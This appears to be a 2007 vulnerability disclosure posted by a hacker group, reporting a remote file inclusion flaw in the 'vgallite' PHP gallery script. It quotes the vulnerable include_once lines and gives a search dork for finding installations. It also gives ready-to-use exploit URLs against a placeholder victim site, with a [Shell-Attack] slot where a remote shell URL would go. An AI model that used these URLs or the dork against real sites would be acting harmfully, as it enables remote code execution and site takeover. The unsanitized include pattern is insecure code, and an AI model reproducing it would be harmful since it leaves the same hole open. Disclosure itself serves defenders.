Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

C-SAM oneWallet forget password Cross Site Scripting vulnerability

VisionProject Multiple XSS vuln.

EZPhotoSales 1.9.3 Multiple Vulnerabilities

PHP mSQL (msql_connect) Buffer Overflow PoC

From:	RaeD Hasadya <raed_(at)_bsdmail.com>
Date:	06.08.2007
Subject:	ALL vgallite Remote File Include

Discovred By : Hasadya Raed
----------------------------
Contact : RaeD@BsdMail.Com , Hacker_Web@W.Cn , Gunman_Pump@Hotmail.Com
----------------------------
Greetz : Jonathan , Muts  
----------------------------
Script: ALL vgallite
----------------------------
Dork: "vgallite"
----------------------------
B.File:
_functions.php
index.php
----------------------------
Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename");
Vuln code: include_once("lang/".
((isset($language))?$language:"english").
".php");
----------------------------
Exploit:
Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack]
Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>